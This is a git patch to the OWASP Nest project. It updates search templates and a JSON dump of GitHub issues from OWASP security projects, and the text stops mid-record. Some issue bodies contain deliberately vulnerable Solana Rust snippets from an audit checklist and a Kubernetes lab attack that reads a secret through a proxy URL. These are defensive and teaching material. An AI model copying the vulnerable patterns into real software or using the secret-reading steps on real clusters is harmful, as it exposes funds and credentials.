From 884fcf69876334635957846b061a416bd344f08d Mon Sep 17 00:00:00 2001 From: Arkadii Yakovets Date: Sun, 22 Sep 2024 16:44:59 -0700 Subject: [PATCH] Update pages and nest.json --- .../apps/owasp/templates/search/issue.html | 11 +- .../apps/owasp/templates/search/project.html | 14 + backend/data/nest.json | 368437 ++++++++++++--- 3 files changed, 314813 insertions(+), 53649 deletions(-) diff --git a/backend/apps/owasp/templates/search/issue.html b/backend/apps/owasp/templates/search/issue.html index 9c436e263..1ba70cd28 100644 --- a/backend/apps/owasp/templates/search/issue.html +++ b/backend/apps/owasp/templates/search/issue.html @@ -87,10 +87,13 @@
+ style="text-decoration: none"> + + Read more +
@@ -215,6 +218,8 @@
How to tackle it
}); }, showIssueDetails(issue) { + const detailsModal = new bootstrap.Modal(document.getElementById('detailsModal')); + detailsModal.show(); this.selectedIssue = issue; }, handleInput(event) { diff --git a/backend/apps/owasp/templates/search/project.html b/backend/apps/owasp/templates/search/project.html index 84de5cbc9..f414e72b0 100644 --- a/backend/apps/owasp/templates/search/project.html +++ b/backend/apps/owasp/templates/search/project.html @@ -131,6 +131,16 @@

+
@@ -214,6 +224,10 @@

new bootstrap.Tooltip(tooltipTriggerEl); }); }, + contribute(projectName) { + window.open(`/projects/contribute?q=${projectName}`, '_blank'); + + }, removeTooltips() { const tooltipTriggerList = [].slice.call(document.querySelectorAll('[data-bs-toggle="tooltip"]')); tooltipTriggerList.forEach(function(tooltipTriggerEl) { diff --git a/backend/data/nest.json b/backend/data/nest.json index 57dcfd682..891538241 100644 --- a/backend/data/nest.json +++ b/backend/data/nest.json @@ -4,7 +4,7 @@ "pk": 1, "fields": { "nest_created_at": "2024-09-11T19:06:59.693Z", - "nest_updated_at": "2024-09-18T17:24:20.914Z", + "nest_updated_at": "2024-09-22T15:26:33.936Z", "node_id": "I_kwDOMl6dl86V22oI", "title": "Hardcoded username and endless loop tests didn't work ", "body": "Hi there!\r\nI tried ABAP-Code-Analyzer with the \"python main.py ABAPTeste02ListagemdeOV.txt\" command. ABAPTeste02ListagemdeOV.txt ( attached) file was in the same directory than ABAP-Code-Analyzer.\r\nThe xls output file was generated with no lines (attached).\r\nI had understood ABAP-Code-Analyzer should \"caught\" hardcode user name and endless loop...\r\nThanks!\r\n[abap_security_scan_report.xlsx](https://github.com/user-attachments/files/16932297/abap_security_scan_report.xlsx)\r\n[ABAPTeste02ListagemdeOV.txt](https://github.com/user-attachments/files/16932299/ABAPTeste02ListagemdeOV.txt)\r\n", @@ -32,7 +32,7 @@ "pk": 2, "fields": { "nest_created_at": "2024-09-11T19:10:10.587Z", - "nest_updated_at": "2024-09-18T17:26:53.823Z", + "nest_updated_at": "2024-09-22T15:29:44.464Z", "node_id": "I_kwDOLYZa3c6BGmff", "title": "SDRF Working Group Meetings", "body": "OWASP SDRF Weekly Meeting\r\n**First Meeting**: Monday, 4 March · 5:00 – 6:00pm\r\n**Time zone**: Australia/Sydney\r\n**URL**: https://meet.google.com/yvq-phpg-viy\r\n\r\nWill re-occur weekly on Mondays 5PM AEDT. ", @@ -60,7 +60,7 @@ "pk": 3, "fields": { "nest_created_at": "2024-09-11T19:10:47.813Z", - "nest_updated_at": "2024-09-18T17:27:24.424Z", + "nest_updated_at": "2024-09-22T15:30:22.910Z", "node_id": "I_kwDOLD0lt86ByuLx", "title": "Please add a description to this project", "body": "", @@ -88,7 +88,7 @@ "pk": 4, "fields": { "nest_created_at": "2024-09-11T19:10:51.794Z", - "nest_updated_at": "2024-09-18T17:27:27.896Z", + "nest_updated_at": "2024-09-22T15:30:26.482Z", "node_id": "I_kwDOLD0cZ859uhUf", "title": "Solana Top Common Smart Contract Issues - QuillAudits", "body": "**### 1] Integer Overflow** \r\n**Rust offers different integer types with varying ranges:**\r\nu8 (8 bits): 0 to 255\r\nu16 (16 bits): 0 to 65535\r\nu32 (32 bits): 0 to 4294967295\r\nu64 (64 bits): 0 to 18446744073709551615\r\nu128 (128 bits): 0 to a very large positive number\r\n\r\nInteger overflow occurs when an arithmetic operation results in a value that exceeds the maximum representable value of the chosen integer data type. \r\nFor example, a = a + 1 — if an u8 integer a is changed to a value outside of its range, say 256 or -1, then an overflow/underflow will occur.\r\nThis can lead to unexpected behavior in smart contracts, as the value wraps around to the minimum value instead of throwing an error.\r\n\r\n**Example:-**\r\n```\r\n\r\nub fn pretty_time(t: u64) -> String { \r\nlet seconds = t % 60;\r\n let minutes = (t / 60) % 60;\r\n let hours = (t / (60 * 60)) % 24;\r\n let days = t / (60 * 60 * 24);\r\n\r\n\r\npub fn calculate_fee_from_amount(amount: u64, percentage: f32) -> u64 {\r\n if percentage <= 0.0 {\r\n return 0\r\n }\r\n let precision_factor: f32 = 1000000.0;\r\n let factor = (percentage / 100.0 * precision_factor) as u128; //largest it can get is 10^4\r\n (amount as u128 * factor / precision_factor as u128) as u64 // this does not fit if amount\r\n // itself cannot fit into u64\r\n\r\n```\r\n\r\n`Description`:\r\nIn the above functions mentioned, we are doing some calculations using the `*` and `/` operators, which can cause an overflow/underflow. If one uses the debug, build, it can cause a panic; however, in the release build, it will underflow silently.\r\n\r\n`Remediation`\r\n1. Instead of using the `*` operator, we recommend using the `checked_mul` function to prevent an overflow.\r\n2. Instead of using the `/` operator, we recommend using the `checked_div` function to prevent an underflow.\r\n\r\n\r\n### 2]Missing Account Verification \r\nThe \"Missing Account Verification\" issue in Rust smart contracts on the Solana blockchain typically arises when a smart contract fails to verify or check the ownership and structure of an account, potentially leading to vulnerabilities. This can occur due to various reasons, such as incorrect constructor arguments, failed contract verification, or lack of signature validation. This can lead to several problems, including Unauthorized Access, Denial-of-Service Attacks, and Loss of Funds.\r\n\r\n**Example:-**\r\n ```\r\n if !acc.sender.is_signer || !acc.metadata.is_signer {\r\n return Err(ProgramError::MissingRequiredSignature)\r\n }\r\n\r\ncreate.rs - Line 121:\r\n if a.rent.key != &sysvar::rent::id() ||\r\n a.token_program.key != &spl_token::id() ||\r\n a.associated_token_program.key != &spl_associated_token_account::id() ||\r\n a.system_program.key != &system_program::id()\r\n {\r\n return Err(ProgramError::InvalidAccountData)\r\n }\r\n\r\n```\r\n```\r\ncreate.rs - Line 85:\r\n if !a.sender.is_writable || //fee payer\r\n !a.sender_tokens.is_writable || //debtor\r\n !a.recipient_tokens.is_writable || //might be created\r\n !a.metadata.is_writable || //will be created\r\n !a.escrow_tokens.is_writable || //creditor\r\n !a.streamflow_treasury_tokens.is_writable || //might be created\r\n !a.partner_tokens.is_writable\r\n //might be created\r\n // || !a.liquidator.is_writable //creditor (tx fees)\r\n {\r\n return Err(SfError::AccountsNotWritable.into())\r\n }\r\n```\r\n\r\n```\r\ncreate.rs - Line 80:\r\n if !a.escrow_tokens.data_is_empty() || !a.metadata.data_is_empty() {\r\n return Err(ProgramError::AccountAlreadyInitialized)\r\n }\r\n\r\n```\r\n```\r\ncreate.rs - Line 99:\r\n let strm_treasury_pubkey = Pubkey::from_str(STRM_TREASURY).unwrap();\r\n let withdrawor_pubkey = Pubkey::from_str(WITHDRAWOR_ADDRESS).unwrap();\r\n let strm_treasury_tokens = get_associated_token_address(&strm_treasury_pubkey, a.mint.key);\r\n let sender_tokens = get_associated_token_address(a.sender.key, a.mint.key);\r\n let recipient_tokens = get_associated_token_address(a.recipient.key, a.mint.key);\r\n let partner_tokens = get_associated_token_address(a.partner.key, a.mint.key);\r\n\r\n\r\n if a.streamflow_treasury.key != &strm_treasury_pubkey ||\r\n a.streamflow_treasury_tokens.key != &strm_treasury_tokens ||\r\n a.withdrawor.key != &withdrawor_pubkey\r\n {\r\n return Err(SfError::InvalidTreasury.into())\r\n }\r\n```\r\n\r\n`Description`: Account verification is critical in Solana programs. Signed and writable accounts, as recommended, are to be verified before the business logic implementation, Also, the accounts data is verified to match the business logic requirements.\r\n\r\n\r\n### 3]Missing Signer check\r\nIf the account provided as a signer is not included as a signer in the transaction, Solana will throw a MissingRequiredSignature error. This helps prevent the unauthorized execution of instructions.\r\n\r\n**Example:-**\r\n\r\n```\r\n let init_vesting_account = create_account(\r\n &payer.key,\r\n &vesting_account_key,\r\n rent.minimum_balance(state_size),\r\n state_size as u64,\r\n &program_id,\r\n );\r\n\r\n```\r\n`Description`: In the above example, An instruction should only be available to a restricted set of entities; the program should verify that the call has been signed by the appropriate entity.\r\n\r\n`Remediation`: Verify that the payer account is a signer using the is_signer() function.\r\n\r\n\r\n### 4]Arithmetic Accuracy Deviation \r\nArithmetic accuracy deviations in Rust smart contracts on Solana can occur due to various factors, leading to unintended behaviour and potential security vulnerabilities. These deviations refer to situations where the outcome of mathematical operations within a smart contract differs from the expected result.\r\n\r\n**Example:-**\r\n \r\n```\r\nlet x = args.num_nfts_in_bucket;\r\n let y = args.num_nfts_in_lockers;\r\n let x_plus_y = (y as u64).checked_add(x as u64).unwrap();\r\n\r\n let numerator = args\r\n .locker_duration\r\n .checked_mul(y as u64)\r\n .unwrap()\r\n .checked_mul(100)\r\n .unwrap()\r\n .checked_mul(LAMPORTS_PER_DROPLET)\r\n .unwrap();\r\n\r\nlet denominator = args.max_locker_duration.checked_mul(x_plus_y).unwrap();\r\n let raw_interest = numerator.checked_div(denominator).unwrap();\r\n\r\n```\r\n`Description`: In the above example,Consider a scenario in which x = 1000, y = 1, and max_duration = t ∗ 116 sec.\r\n• By those above conditions, a user can skip t seconds of duration for interest calculation. \r\n• Letlocker_duration=6, andtis6sec.\r\n• Interest=(6∗1∗100∗108)/(6∗116∗8640∗1001)=(int)0.997765=0\r\n\r\n`Remediation`: It is recommended to perform a ceiling division when calculating interest owed.\r\n\r\n\r\n\r\n### 5]Arbitrary signed program invocation \r\nThe Arbitrary Signed Program Invocation issue in Solana refers to a vulnerability in the token instruction code that allows invoking an arbitrary program instead of the real SPL-token program. This issue can lead to security risks and potential attacks on the Solana blockchain.\r\n\r\nIn Solana, a transaction consists of one or more instructions, an array of accounts to read and write data from, and one or more signatures. Instructions are the smallest execution logic on Solana and invoke programs that make calls to the Solana runtime to update the state. Programs on Solana don't store data/state; rather, data/state is stored in accounts. When a Solana program invokes another program, the callee's program ID is supplied to the call typically through one of the following two functions: invoke or invoke_signed. The program ID is the first parameter of the instruction. In the case of the token instruction, there was a vulnerability that allowed invoking an arbitrary program, which could lead to security risks and potential attacks.\r\n\r\n**Example:-**\r\n```\r\n#[program]\r\npub mod Issue_ASPI {\r\n use super::*;\r\n pub fn transfer_tokens(ctx: Context, amount: u64) -> ProgramResult {\r\n let token_program = ctx.accounts.token_program.clone();\r\n\r\n // Vulnerable: Allowing arbitrary program invocation\r\n invoke(&token_program, &ctx.accounts.token_account, &[amount.to_le_bytes().as_ref()]);\r\n Ok(())\r\n }\r\n}\r\n```\r\n`Description`: In The above example, The code invokes the token_program without validating its program ID. An attacker could supply a malicious program instead, leading to unintended execution.\r\nExploitation:\r\nThe attacker supplies a malicious program ID as token_program.\r\nYour program invokes the malicious program, potentially granting it unintended control over tokens or other assets.\r\n\r\n`Remediation`: To avoid such vulnerabilities and attacks in general, it is essential to ensure that the program ID is correctly checked and validated before executing any instructions\r\n\r\n### 6] Solana account confusions \r\n​​In your Solana smart contracts, remember that users can provide any type of account as input. Don't assume ownership alone guarantees the account matches your expectations. Always verify the account's data type to avoid security vulnerabilities. Solana programs often involve multiple account types for data storage. Checking account ownership isn't enough. Validate every provided account's data type against your intended use.\r\n\r\n**Example:-**\r\n```\r\nprocessor.rs - Line 44\r\n let vesting_account_key = Pubkey::create_program_address(&[&seeds], &program_id).unwrap();\r\n if vesting_account_key != *vesting_account.key {\r\n msg!(\"Provided vesting account is invalid\");\r\n return Err(ProgramError::InvalidArgument);\r\n }\r\n```\r\n\r\n`Description`: In the above example,The address generated using create_program_address is not guaranteed to be a valid program address off the curve. Program addresses do not lie on the ed25519 curve and, therefore, have no valid private key associated with them, and thus, generating a signature for it is impossible. There is about a 50/50 chance of this happening for a given collection of seeds and program ID.\r\n\r\n`Remediation`: To generate a valid program address using a specific seed, use find_program_address function, which iterates through multiple bump seeds until a valid combination that does not lie on the curve is found.\r\n\r\n### 7]Error not handled \r\nUnhandled errors in Rust Solana programs pose a significant threat to their security and functionality. These errors can lead to unexpected behavior, program crashes, and even potential financial losses. When an error occurs, the program can either handle it gracefully or leave it unhandled. Unhandled errors are those that the program doesn't explicitly handle and recover from.\r\n\r\n**Example:-**\r\n\r\n```\r\npub mod my_program {\r\n use super::*;\r\n\r\n pub fn transfer_tokens(ctx: Context, amount: u64) -> ProgramResult {\r\n // Validate inputs\r\n if amount == 0 {\r\n return Err(ProgramError::InvalidInput); // Explicit error for invalid amount\r\n }\r\n // ... (rest of the transfer logic)\r\n // Handle potential errors from other operations\r\n let transfer_result = spl_token::transfer(\r\n /* ... transfer parameters ... */\r\n );\r\n match transfer_result {\r\n Ok(()) => {\r\n // Transfer successful\r\n }\r\n Err(error) => {\r\n // Handle transfer error appropriately\r\n return Err(error);\r\n }\r\n }\r\n\r\n Ok(())\r\n }\r\n```\r\n\r\n`Description`: In the Above Example, there's a potential \"error not handled\" issue. After calling spl_token::transfer, which presumably performs a token transfer operation, the code checks the result with a match statement. If the transfer operation fails, an error is caught, but the error is simply returned without any further handling or logging.\r\n\r\n`Remediation`: In order to mitigate the \"error not handled\" issue, it's recommended to include proper error handling mechanisms, such as logging the error, rolling back any state changes, or taking appropriate actions based on the specific error. Simply returning the error without any additional handling may lead to undesired behavior and make it difficult to identify and debug issues during the execution of the program.\r\n\r\n\r\n", @@ -116,7 +116,7 @@ "pk": 5, "fields": { "nest_created_at": "2024-09-11T19:10:55.756Z", - "nest_updated_at": "2024-09-18T17:27:31.253Z", + "nest_updated_at": "2024-09-22T15:30:30.238Z", "node_id": "I_kwDOLD0PbM6ByuKa", "title": "Please add a description to this project", "body": "", @@ -144,7 +144,7 @@ "pk": 6, "fields": { "nest_created_at": "2024-09-11T19:11:09.490Z", - "nest_updated_at": "2024-09-18T17:27:42.508Z", + "nest_updated_at": "2024-09-22T15:30:44.874Z", "node_id": "I_kwDOLDUp6s6ByuIQ", "title": "Please add a description to this project", "body": "", @@ -172,7 +172,7 @@ "pk": 7, "fields": { "nest_created_at": "2024-09-11T19:11:13.632Z", - "nest_updated_at": "2024-09-18T17:27:45.744Z", + "nest_updated_at": "2024-09-22T15:30:48.333Z", "node_id": "I_kwDOLDUacM6ByuFI", "title": "Please add a description to this project", "body": "", @@ -200,7 +200,7 @@ "pk": 8, "fields": { "nest_created_at": "2024-09-11T19:11:17.662Z", - "nest_updated_at": "2024-09-18T17:27:48.891Z", + "nest_updated_at": "2024-09-22T15:30:51.923Z", "node_id": "I_kwDOLDUMl86ByuDS", "title": "Please add a description to this project", "body": "", @@ -228,7 +228,7 @@ "pk": 9, "fields": { "nest_created_at": "2024-09-11T19:11:21.832Z", - "nest_updated_at": "2024-09-18T17:27:52.225Z", + "nest_updated_at": "2024-09-22T15:30:55.350Z", "node_id": "I_kwDOLDUMEs6ByuCI", "title": "Please add a description to this project", "body": "", @@ -316,7 +316,7 @@ "pk": 12, "fields": { "nest_created_at": "2024-09-11T19:11:28.496Z", - "nest_updated_at": "2024-09-18T17:27:55.728Z", + "nest_updated_at": "2024-09-22T15:30:58.870Z", "node_id": "I_kwDOLDUCls6VlrRN", "title": "Should DLL Hijacking be a single item?", "body": "as suggested in #6 by @matreurai \r\n\r\n> Note : I've seen in TASVS-STORAGE a category specific to a specific vulnerability (DLL Hijacking). I think this should be modified as the testing standard is not made for specific vulnerabilities in my opinion. Additionally, these items are explaining a type of attack and do not provide any guidance to what to test or how to prevent/mitigate risks of such attacks. The equivalent in the Web Application Security Verification Standard would be to add an item as such:\r\n> \"Cross-Site Scripting Category - Blind cross-site scripting (XSS) is a variant of stored XSS where the malicious payload is executed in a different context or application than where it was originally injected.\".\r\n> I don't think this make sense in the context of a Verification Standard.", @@ -381,7 +381,7 @@ "pk": 14, "fields": { "nest_created_at": "2024-09-11T19:12:15.554Z", - "nest_updated_at": "2024-09-18T17:28:33.314Z", + "nest_updated_at": "2024-09-22T15:31:46.103Z", "node_id": "I_kwDOKrhCTc6Byt6F", "title": "Please add a description to this project", "body": "", @@ -409,7 +409,7 @@ "pk": 15, "fields": { "nest_created_at": "2024-09-11T19:12:19.748Z", - "nest_updated_at": "2024-09-18T17:28:36.685Z", + "nest_updated_at": "2024-09-22T15:31:49.575Z", "node_id": "I_kwDOKrgTWc6Byt17", "title": "Please add a description to this project", "body": "", @@ -523,7 +523,7 @@ "pk": 19, "fields": { "nest_created_at": "2024-09-11T19:13:31.551Z", - "nest_updated_at": "2024-09-18T17:29:31.459Z", + "nest_updated_at": "2024-09-22T15:33:04.342Z", "node_id": "I_kwDOKYMc786S-W9h", "title": "Option to bypass host availability check", "body": "If the server now returns a 502 on the root request, the testing will stop. Some servers only reply to valid paths for request. It would be nice if we can have a flag to bypass this \"check whether host is available\". Further, it appears that this host check request is not passed through the provided http proxy using -p http://127.0.0.1:8080.", @@ -555,7 +555,7 @@ "pk": 20, "fields": { "nest_created_at": "2024-09-11T19:14:15.683Z", - "nest_updated_at": "2024-09-18T17:29:46.643Z", + "nest_updated_at": "2024-09-22T15:33:23.295Z", "node_id": "I_kwDOKSOWo86Byt0T", "title": "Please add a description to this project", "body": "", @@ -583,7 +583,7 @@ "pk": 21, "fields": { "nest_created_at": "2024-09-11T19:14:29.608Z", - "nest_updated_at": "2024-09-18T17:29:58.238Z", + "nest_updated_at": "2024-09-22T15:33:37.716Z", "node_id": "I_kwDOKLCek86Bytxf", "title": "Please add a description to this project", "body": "", @@ -729,7 +729,7 @@ "pk": 26, "fields": { "nest_created_at": "2024-09-11T19:14:51.096Z", - "nest_updated_at": "2024-09-18T17:30:12.294Z", + "nest_updated_at": "2024-09-22T15:33:54.212Z", "node_id": "I_kwDOKHixBs6Bytup", "title": "Please add a description to this project", "body": "", @@ -757,7 +757,7 @@ "pk": 27, "fields": { "nest_created_at": "2024-09-11T19:15:24.498Z", - "nest_updated_at": "2024-09-18T17:30:39.933Z", + "nest_updated_at": "2024-09-22T15:34:31.447Z", "node_id": "I_kwDOJ_RyPc6Bytpb", "title": "Please add a description to this project", "body": "", @@ -785,7 +785,7 @@ "pk": 28, "fields": { "nest_created_at": "2024-09-11T19:15:28.512Z", - "nest_updated_at": "2024-09-18T17:30:43.233Z", + "nest_updated_at": "2024-09-22T15:34:34.950Z", "node_id": "I_kwDOJ8-yTs6NkH0A", "title": "Need to know the status", "body": "Hi Team,\r\n\r\nAny update on this project and where are we standing !. Let me know if need any help !\r\n\r\nThanks,\r\nJanibasha", @@ -813,7 +813,7 @@ "pk": 29, "fields": { "nest_created_at": "2024-09-11T19:15:58.522Z", - "nest_updated_at": "2024-09-18T17:31:07.981Z", + "nest_updated_at": "2024-09-22T15:35:06.317Z", "node_id": "I_kwDOJx_i6s6Bytkp", "title": "Please add a description to this project", "body": "", @@ -841,7 +841,7 @@ "pk": 30, "fields": { "nest_created_at": "2024-09-11T19:16:09.384Z", - "nest_updated_at": "2024-09-18T17:31:16.993Z", + "nest_updated_at": "2024-09-22T15:35:17.184Z", "node_id": "I_kwDOJsDs1M6Bytiv", "title": "Please add a description to this project", "body": "", @@ -892,8 +892,8 @@ 16 ], "labels": [ - 7, - 8 + 8, + 7 ] } }, @@ -1059,8 +1059,8 @@ 20 ], "labels": [ - 7, - 12 + 12, + 7 ] } }, @@ -1285,9 +1285,9 @@ 17 ], "labels": [ - 7, + 19, 12, - 19 + 7 ] } }, @@ -1550,8 +1550,8 @@ 22 ], "labels": [ - 10, - 17 + 17, + 10 ] } }, @@ -1583,8 +1583,8 @@ 28 ], "labels": [ - 14, - 21 + 21, + 14 ] } }, @@ -1646,8 +1646,8 @@ 30 ], "labels": [ - 17, - 24 + 24, + 17 ] } }, @@ -1808,7 +1808,7 @@ "pk": 60, "fields": { "nest_created_at": "2024-09-11T19:17:10.526Z", - "nest_updated_at": "2024-09-18T17:31:20.411Z", + "nest_updated_at": "2024-09-22T15:35:21.099Z", "node_id": "I_kwDOJjxT186QMuv1", "title": "cannot access editable source of v2 diagram - www-project-top-10-for-large-language-model-applications/2_0_vulns/artifacts /v2.0 - OWASP Top 10 for LLM Applications and Generative AI - LLM Application HLD - Presentation DLD.jpeg", "body": "Remember, an issue is not the place to ask questions. You can use our [Slack channel](https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/wiki) for that, or you may want to consult the following Slack channels:\r\n\r\n- [#project-top10-for-llm](https://owasp.slack.com/archives/C05956H7R8R)\r\n- [#team-llm-web](https://owasp.slack.com/archives/C06RXVCQB1C)\r\n- [#team-llm_diagrams_and_visuals](https://owasp.slack.com/archives/C05L7TW8VCY)\r\n- Each vulnerabilities has its own dedicated Slack channel for discussions in the format of `#team-llm0X`, I.E ([#team-llm03_data_and_model_poisoning](https://owasp.slack.com/archives/C05F7JWFYBU))\r\n\r\n### When reporting an issue, please be sure to include the following:\r\n- [ ] Before you open an issue, please check if a similar issue already exists or has been closed before.\r\n- [ ] A descriptive title and apply the specific **LLM-0-10** label relative to the entry. See our [available labels](https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/labels).\r\n- [ ] A description of the problem you're trying to solve, including *why* you think this is a problem\r\n- [ ] If the enhancement changes current behavior, reasons why your solution is better\r\n- [ ] What artifact and version of the project you're referencing, and the location (I.E OWASP site, llmtop10.com, repo)\r\n- [ ] The behavior you expect to see, and the actual behavior\r\n\r\n#### Steps to Reproduce\r\n-------------------------------------------\r\n1. …\r\n2. …\r\n3. …\r\n\r\n#### What happens?\r\n-------------\r\n…\r\n\r\n#### What were you expecting to happen?\r\n----------------------------------\r\n…\r\n\r\n#### Any logs, error output, etc?\r\n----------------------------\r\n\r\n\r\n#### Any other comments?\r\n-------------------\r\n…\r\n\r\n- [ ] Slack post link (if relevant)\r\n\r\n#### What versions of hardware and software are you using?\r\n----------------------------------------\r\n**Operating System:** …\r\n**Browser:** …\r\n\r\n- [ ] Chrome\r\n- [ ] Firefox\r\n- [ ] Edge\r\n- [ ] Safari 11\r\n- [ ] Safari 10\r\n- [ ] IE 11\r\n", @@ -1838,7 +1838,7 @@ "pk": 61, "fields": { "nest_created_at": "2024-09-11T19:17:38.472Z", - "nest_updated_at": "2024-09-18T17:31:44.086Z", + "nest_updated_at": "2024-09-22T15:36:02.164Z", "node_id": "I_kwDOJZbJH86L0MUq", "title": "ERROR: No matching distribution found for pywin==306", "body": "Hello,\r\n\r\nI had an error while installing requirements.txt, see the screenshot below:\r\n\r\n![image](https://github.com/OWASP/SAPKiln/assets/32524544/2dacd340-1737-44fb-9d91-ea0a8d068a5f)\r\n\r\nhow can I solve it?", @@ -1866,7 +1866,7 @@ "pk": 62, "fields": { "nest_created_at": "2024-09-11T19:17:45.802Z", - "nest_updated_at": "2024-09-18T17:31:50.299Z", + "nest_updated_at": "2024-09-22T15:36:10.465Z", "node_id": "I_kwDOJZXuOs6Bythd", "title": "Please add a description to this project", "body": "", @@ -1894,7 +1894,7 @@ "pk": 63, "fields": { "nest_created_at": "2024-09-11T19:18:21.161Z", - "nest_updated_at": "2024-09-18T17:32:15.734Z", + "nest_updated_at": "2024-09-22T15:36:42.380Z", "node_id": "I_kwDOJTHMcM6Bytfk", "title": "Please add a description to this project", "body": "", @@ -1922,7 +1922,7 @@ "pk": 64, "fields": { "nest_created_at": "2024-09-11T19:18:41.667Z", - "nest_updated_at": "2024-09-18T17:32:32.937Z", + "nest_updated_at": "2024-09-22T15:37:04.333Z", "node_id": "I_kwDOJNCEE86Byta2", "title": "Please add a description to this project", "body": "", @@ -2049,7 +2049,7 @@ "pk": 68, "fields": { "nest_created_at": "2024-09-11T19:18:58.756Z", - "nest_updated_at": "2024-09-18T17:32:42.196Z", + "nest_updated_at": "2024-09-22T15:37:14.569Z", "node_id": "I_kwDOJJEsKM6Gx0SR", "title": "Add IntelliJ 2024.1 support", "body": "I would really love to also use the plugin in IntelliJ 2024.1\r\n\r\nCurrently it's not listed as available for this version. Haven't tried installing it manually tho.", @@ -2077,7 +2077,7 @@ "pk": 69, "fields": { "nest_created_at": "2024-09-11T19:19:15.530Z", - "nest_updated_at": "2024-09-18T17:32:56.698Z", + "nest_updated_at": "2024-09-22T15:37:32.805Z", "node_id": "I_kwDOI9Ahm85r2IXl", "title": "Please consider Oracle manipulation", "body": "Hi there,\r\n\r\nThanks for this great repo. After reading the top 10 list, IMHO, please consider to add Oracle manipulation into this (some hacks happened).\r\n\r\nAbout Oracle manipulation:\r\n\r\n# Oracle manipulation\r\n## Desciption\r\nOracle manipulation is an attack that smart contract rely off-chain information on other services called oracles (eg. price). If the data was wrong it might lead to abnormal behavior.\r\n\r\n## Impact\r\nMight drain the pool from Defi protocol.\r\n\r\n## Steps to fix\r\nUse a decentralized oracle network, or time-weighted average price feed.\r\n\r\n## Example\r\nThe lending contract use the price from dex oracle, attacker make flash loan and manipulate the token price (drain one asset from the pool). After price manipulation, attacker can make loan from lending pool if the token price source is dex oracle and not validated properly.", @@ -2275,7 +2275,7 @@ "pk": 76, "fields": { "nest_created_at": "2024-09-11T19:20:48.056Z", - "nest_updated_at": "2024-09-18T18:54:17.159Z", + "nest_updated_at": "2024-09-22T18:41:39.654Z", "node_id": "I_kwDOIhSPhM5YsL-r", "title": "Getting specific containers that fail the checker rule.", "body": "If any container violates the checker rule, the culprit must be busted. So, better to create a ContainerCheck Flow that will help identify the culprit. \r\n\r\nSteps \r\n1. Creating a Container Check Class\r\n2. Passing the Parent Workload via TinyDB Query Lambdas\r\n3. Collect all the Parent Workloads violation and child containers in a Static Variable or Otherwise. \r\n4. Ignore the TinyDB result and prioritize the ContainerCheck Class output", @@ -2485,7 +2485,7 @@ "pk": 83, "fields": { "nest_created_at": "2024-09-11T19:21:03.949Z", - "nest_updated_at": "2024-09-18T17:34:13.576Z", + "nest_updated_at": "2024-09-22T15:39:19.761Z", "node_id": "I_kwDOIbsMfc6BytVG", "title": "Please add a description to this project", "body": "", @@ -2513,7 +2513,7 @@ "pk": 84, "fields": { "nest_created_at": "2024-09-11T19:21:27.404Z", - "nest_updated_at": "2024-09-18T17:34:33.030Z", + "nest_updated_at": "2024-09-22T15:39:45.202Z", "node_id": "I_kwDOITh-Lc6FWu_t", "title": "Associated Github Repo no longer exists", "body": "https://github.com/anil-yelken/Vulnerable-Flask-App\r\n\r\nNo longer exists.", @@ -2725,7 +2725,7 @@ "pk": 91, "fields": { "nest_created_at": "2024-09-11T19:22:13.123Z", - "nest_updated_at": "2024-09-18T18:55:23.499Z", + "nest_updated_at": "2024-09-22T18:43:20.753Z", "node_id": "I_kwDOH7x8X86SdOo1", "title": "Upgrade to the latest wrongsecrets (1.9.1)", "body": "- [x] update k8s to 1.30: https://github.com/OWASP/wrongsecrets-ctf-party/pull/666\r\n- [x] update all deps\r\n- [ ] enable the new challenge in javascript (e.g. add sealed-secrets items) and upgrade to 1.9.1 for wrongsecrets image\r\n - [ ] make 1.9.x where challenge 48 is enabled in CTF mode and update vault challenge CTF settings and vault-challenges can be temporary disabled via env-vars.\r\n - [ ] create javascript for ctf-party with new tests\r\n - [ ] release new balancer image\r\n- [ ] fix https://github.com/OWASP/wrongsecrets-ctf-party/issues/665\r\n- [ ] fix https://github.com/OWASP/wrongsecrets-ctf-party/pull/630\r\n- [ ] fix https://github.com/OWASP/wrongsecrets-ctf-party/pull/642\r\n- [ ] update and fix CTFd everywhere", @@ -2786,7 +2786,7 @@ "pk": 93, "fields": { "nest_created_at": "2024-09-11T19:23:40.415Z", - "nest_updated_at": "2024-09-18T17:36:01.054Z", + "nest_updated_at": "2024-09-22T15:41:52.837Z", "node_id": "I_kwDOHpaoic6BytQC", "title": "Please add a description to this project", "body": "", @@ -2874,7 +2874,7 @@ "pk": 96, "fields": { "nest_created_at": "2024-09-11T19:24:04.083Z", - "nest_updated_at": "2024-09-18T18:55:17.550Z", + "nest_updated_at": "2024-09-22T18:43:13.279Z", "node_id": "I_kwDOHeRoz85nH_o0", "title": "Add pre-commit", "body": "for this we need to setup precommit that works at least on macos/linux/windows.\r\n- [ ] Add pre-commit configuration (docs, language related stuff?)\r\n- [ ] onboard wrongsecrets-binaries to automated pre-commit corrections for c/c++\r\n- [ ] onboard wrongsecrets-binaries to automated pre-commit corrections for Rust\r\n- [ ] onboard wrongsecrets-binaries to automated pre-commit corrections for Golang", @@ -2904,7 +2904,7 @@ "pk": 97, "fields": { "nest_created_at": "2024-09-11T19:24:05.309Z", - "nest_updated_at": "2024-09-18T18:55:18.581Z", + "nest_updated_at": "2024-09-22T18:43:14.285Z", "node_id": "I_kwDOHeRoz85sFR3D", "title": "Add notary for MacOS", "body": "We need to sign the macos binaries:\r\nhttps://github.com/marketplace/actions/code-sign-action ", @@ -2932,7 +2932,7 @@ "pk": 98, "fields": { "nest_created_at": "2024-09-11T19:25:01.635Z", - "nest_updated_at": "2024-09-18T17:37:06.479Z", + "nest_updated_at": "2024-09-22T15:43:26.637Z", "node_id": "I_kwDOHGUcT855-cLX", "title": "Unnecessary use of LIST permission example of attack does not work", "body": "I tired to replicate the Unnecessary use of LIST permission example attack but it does not work. I think the problem is that in the K8s version before 1.24, every time we would create a service account, a non-expiring secret token (Mountable secrets & Tokens) was created by default. However, from version 1.24 onwards, it was disbanded and no secret token is created by default when we create a service account.\r\n\r\nWhen i tried to access to http://127.0.0.1:8001/api/v1/namespaces/default/secrets/abcd link i can see the \"secretAuthToken\": \"dmVyeVNlY3VyZTEyMw==\"\r\n", @@ -2960,7 +2960,7 @@ "pk": 99, "fields": { "nest_created_at": "2024-09-11T19:25:06.040Z", - "nest_updated_at": "2024-09-18T17:37:09.871Z", + "nest_updated_at": "2024-09-22T15:43:36.078Z", "node_id": "I_kwDOHGSr786BytOw", "title": "Please add a 